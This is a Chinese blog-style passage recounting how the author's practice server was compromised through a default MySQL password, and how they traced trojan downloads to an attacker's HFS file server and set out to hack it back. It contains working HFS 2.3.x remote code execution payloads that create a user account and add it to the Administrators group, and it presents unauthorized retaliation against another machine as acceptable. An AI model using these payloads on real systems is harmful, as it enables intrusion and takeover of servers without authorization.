自己的服务器被黑客抓鸡-看我如何反击 _抓鸡

文章插图

我与该学员的聊天截图

文章插图

脚本黑客的服务器桌面截图

文章插图

如何渗透进去的呢

文章插图

科普HFS
先来科普一下：

HFS是什么？

HFS网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统

如果您觉得架设FTP Server太麻烦，那么这个软件可以提供您更方便的网络文件传输系统，下载后无须安装，只要解压缩后执行 hfs.exe，于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键
【自己的服务器被黑客抓鸡-看我如何反击】
即可新增/移除虚拟档案资料夹，或者直接将欲加入的档案拖曳至此窗口，便可架设完成个人HTTP网络文件服务器。

事情原因
今天我发现我自己练习用的服务器被别人挂了一句话木马
（我没有修改phpstudy的MySQL数据库默认密码），一定要注意弱口令和及时更改默认密码

如图打开主页成这样的了都是些数据库的日志应该是被黑客给搞了

（太可怕了），怪自己太疏忽。

文章插图

我在里面发现了一些奇怪的下载连接，判断了下，应该是下载木马的连接

文章插图

文章插图

然后我通过浏览器访问了下该地址，发现是一个HFS的程序

文章插图

文章插图

然后发现上面全是木马exe，可能是脚本小子用来抓肉鸡用的
我记得没错的话。
HFS2.3.X有个远程代码执行的漏洞

Payload：

http://127.0.0.1/?search==%00{.exec|cmd /c net user DEF DEFHACKER123 /add.} http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators DEF /add.}

反击
HFS2.3.X代码执行的利用工具，我从网上下载了一个